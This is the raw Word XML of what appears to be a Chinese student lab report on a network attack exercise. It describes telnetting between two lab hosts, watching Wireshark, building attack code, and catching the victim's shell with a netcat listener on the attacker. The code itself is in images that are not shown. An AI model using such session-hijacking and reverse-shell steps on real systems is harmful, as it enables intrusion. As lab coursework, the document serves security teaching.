    <w:p w14:paraId="75B1EDC0" w14:textId="45FAD091" w:rsidR="007F7ECF" w:rsidRPr="007F7ECF" w:rsidRDefault="007F7ECF" w:rsidP="007F7ECF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7ECF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA1A956" w14:textId="73EA1198" w:rsidR="007F7ECF" w:rsidRDefault="007F7ECF" w:rsidP="007F7ECF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先1</w:t>
      </w:r>
      <w:r>
        <w:t>0.9.0.6telnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接1</w:t>
      </w:r>
      <w:r>
        <w:t>0.9.0.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，查看w</w:t>
      </w:r>
      <w:r>
        <w:t>ireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133F5CAD" w14:textId="5B4D1D0F" w:rsidR="00EA0B7B" w:rsidRDefault="00A71F6C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30EDB030" wp14:editId="72C06E1C">
            <wp:extent cx="6283964" cy="21183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3142" cy="21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B013" w14:textId="47F200C4" w:rsidR="00A71F6C" w:rsidRDefault="00A71F6C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造攻击代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A144CAD" w14:textId="3D01DABC" w:rsidR="00124CFD" w:rsidRDefault="005D1C13">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B313092" wp14:editId="51844001">
            <wp:extent cx="5274310" cy="12033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D4DD" w14:textId="082C045E" w:rsidR="00124CFD" w:rsidRDefault="00124CFD">
      <w:r>
        <w:t>Attacke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r上开启n</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，执行攻击代码</w:t>
      </w:r>
      <w:r w:rsidR="005D1C13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以看到获得了</w:t>
      </w:r>
      <w:r w:rsidR="005D1C13">
        <w:t>victim</w:t>
      </w:r>
      <w:r w:rsidR="005D1C13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的s</w:t>
      </w:r>
      <w:r w:rsidR="005D1C13">
        <w:t>hell</w:t>
      </w:r>
      <w:r w:rsidR="005D1C13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，下图中s</w:t>
      </w:r>
      <w:r w:rsidR="005D1C13">
        <w:t>ecret</w:t>
      </w:r>
      <w:r w:rsidR="005D1C13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是上题在v</w:t>
      </w:r>
      <w:r w:rsidR="005D1C13">
        <w:t>ictim</w:t>
      </w:r>
      <w:r w:rsidR="005D1C13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中创建的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCDF7FD" w14:textId="1C94A0EC" w:rsidR="005D1C13" w:rsidRPr="007F721A" w:rsidRDefault="005D1C13">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CEE4632" wp14:editId="1642C51B">
            <wp:extent cx="5274310" cy="2957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C13" w:rsidRPr="007F72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06"/>
    <w:rsid w:val="000134ED"/>
    <w:rsid w:val="00030A44"/>
    <w:rsid w:val="000518EE"/>
    <w:rsid w:val="000B48FB"/>
    <w:rsid w:val="000C4656"/>
    <w:rsid w:val="00100D97"/>
    <w:rsid w:val="001031A5"/>
    <w:rsid w:val="00124CFD"/>
    <w:rsid w:val="001B390F"/>
    <w:rsid w:val="00255DD9"/>
    <w:rsid w:val="002A6FFB"/>
    <w:rsid w:val="002D32EB"/>
    <w:rsid w:val="00301347"/>
    <w:rsid w:val="00342C35"/>
    <w:rsid w:val="00345083"/>
    <w:rsid w:val="00350F90"/>
    <w:rsid w:val="00432051"/>
    <w:rsid w:val="004B0BCD"/>
    <w:rsid w:val="004F024D"/>
    <w:rsid w:val="00500749"/>
    <w:rsid w:val="005D1C13"/>
    <w:rsid w:val="00712379"/>
    <w:rsid w:val="00727956"/>
    <w:rsid w:val="007F721A"/>
    <w:rsid w:val="007F7ECF"/>
    <w:rsid w:val="00806A13"/>
    <w:rsid w:val="00833150"/>
    <w:rsid w:val="008B3235"/>
    <w:rsid w:val="008D2306"/>
    <w:rsid w:val="008F3569"/>
    <w:rsid w:val="008F46B0"/>
    <w:rsid w:val="009473E6"/>
    <w:rsid w:val="00996641"/>
    <w:rsid w:val="009B4CEE"/>
    <w:rsid w:val="00A10EF9"/>
    <w:rsid w:val="00A71F6C"/>
    <w:rsid w:val="00B544C1"/>
    <w:rsid w:val="00BF0F88"/>
    <w:rsid w:val="00C6499F"/>
    <w:rsid w:val="00C91038"/>
    <w:rsid w:val="00CD23C6"/>
    <w:rsid w:val="00D459EB"/>
    <w:rsid w:val="00D55527"/>
    <w:rsid w:val="00D71606"/>
    <w:rsid w:val="00DA4E7B"/>
    <w:rsid w:val="00DC6E7A"/>
    <w:rsid w:val="00E729EC"/>
    <w:rsid w:val="00EA0B7B"/>
    <w:rsid w:val="00F62E00"/>
    <w:rsid w:val="00F6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7C567"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{101A7C8E-BE94-4006-9E4E-157FCF06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41</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-10T03:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-10T06:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>